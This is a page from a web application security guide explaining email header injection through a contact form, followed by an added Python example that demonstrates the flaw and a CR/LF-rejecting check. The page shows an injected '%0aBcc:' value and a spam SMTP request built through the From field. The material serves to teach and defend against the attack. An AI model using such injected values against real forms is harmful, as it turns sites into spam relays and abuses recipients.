Web application security - the fast guide 1.1 | Page 145
Chapter 7 - Attack execution (3)
Attack process:
The original form listing is as follows:
To: [email protected]
From: [email protected]
Subject: Site problem
Confirm Order page doesn’t load
The attacker simply appends a Bcc header to the user email address field, and
the same message will be sent to the addresses set in that header.
%0aBcc:[email protected]
The attacker can also add the spam message contents, so the full SMTP request
will be as follows:
To: [email protected]
From: [email protected]%0aBcc:[email protected]
Subject: SPAAAAAM SUBBJECT
Hello dear receiver this Is the spam message contents.
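
The following is an added example, not part of the original book. It shows how the decoded %0a turns one From field into two headers when form input is concatenated into the message, and a check that rejects it. The addresses and function names are constructed for illustration, since the page's own addresses are redacted.

```python
from email import message_from_string
from urllib.parse import unquote

SITE_TO = "support@example.com"  # constructed address; the page's are redacted

def naive_message(from_field, subject, body):
    """Vulnerable pattern: decoded form input is pasted straight into headers."""
    return (f"To: {SITE_TO}\n"
            f"From: {unquote(from_field)}\n"
            f"Subject: {unquote(subject)}\n"
            f"\n{body}")

def header_names(raw):
    """Header names as a mail parser reads them from the raw message."""
    return [name for name, _ in message_from_string(raw).items()]

def safe_header(value):
    """Decode the field, then refuse any value containing CR or LF."""
    decoded = unquote(value)
    if "\r" in decoded or "\n" in decoded:
        raise ValueError("line break in header field")
    return decoded

def safe_message(from_field, subject, body):
    """Same message layout, but every header value passes safe_header first."""
    return (f"To: {SITE_TO}\n"
            f"From: {safe_header(from_field)}\n"
            f"Subject: {safe_header(subject)}\n"
            f"\n{body}")

# Constructed input mirroring the page's %0aBcc: value in the From field
INJECTED_FROM = "user@example.org%0aBcc:third-party@example.net"

if __name__ == "__main__":
    # The naive builder yields an extra Bcc header
    print(header_names(naive_message(INJECTED_FROM, "Site problem", "text")))
    try:
        safe_message(INJECTED_FROM, "Site problem", "text")
    except ValueError as err:
        print("rejected:", err)
```

The check runs after URL decoding, so both the encoded form (%0a, %0d) and raw line breaks are caught before the value reaches a header.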